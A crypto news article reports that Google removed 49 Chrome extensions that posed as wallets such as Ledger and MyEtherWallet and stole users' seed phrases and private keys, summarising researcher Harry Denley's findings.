Google removed 49 Chrome extensions from its Web Store, which were posing as legitimate cryptocurrency wallets but contained code that stole crypto-wallet sensitive keys and other private information. The news site ZDNet has been first to report this, showing that the extensions posed as well-known existing crypto wallets including Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMas, Exodus and KeepKey.
The extensions were discovered by Harry Denley, security director at MyCrypto. As he pointed, it shows that all of them were seemingly put together by the same person or group. This is believed to be a Russia-based bad actor. As he said in a blog post on Medium, the malicious browser extensions have always existed but the brands targeted this time are new.
The crypto news now show that Google removed 49 Chrome extensions which were added by users, having no reason to believe that they are not bonafide. Their main goal was to make crypto-wallet transactions.
However, the extensions phished for the user’s personal information, including mnemonic phrases (group of words to recover your crypto wallet), private keys and keystore files. Once the user enters their data to the extension, the data is sent to the actor’s backend or to a Google Form. This is where the bad actors receive the secrets and empty the accounts.
After sending your data to the backend, the extension sends the user back to default mode, as Denley explained. This results in the user getting frustrated and submitting their “secret phrases” once again, or the user uninstalling the extensions, even though their wallet and sensitive info may have been compromised and/or drained of funds.
The good news is that Google removed 49 Chrome extensions which were showing such characteristics. Also, Denley entered the credentials of a test account into one of the extensions, but the funds were not immediately stolen. He then told ZDNet that the threat actor may want to steal funds only from high-value accounts, or has not figured a way to automate the thefts and has to access each account manually.
Still, thefts are happening and as our Bitcoin scam news show, the highest targeted brand of the crypto-wallets was Ledger (57% of all the extensions) followed by MyEtherWallet (with 22% of the extensions).
DC Forecasts is a leader in many crypto news categories, striving for the highest journalistic standards and abiding by a strict set of editorial policies. If you are interested to offer your expertise or contribute to our news website, feel free to contact us at editor@dcforecasts.com
Discussion about this post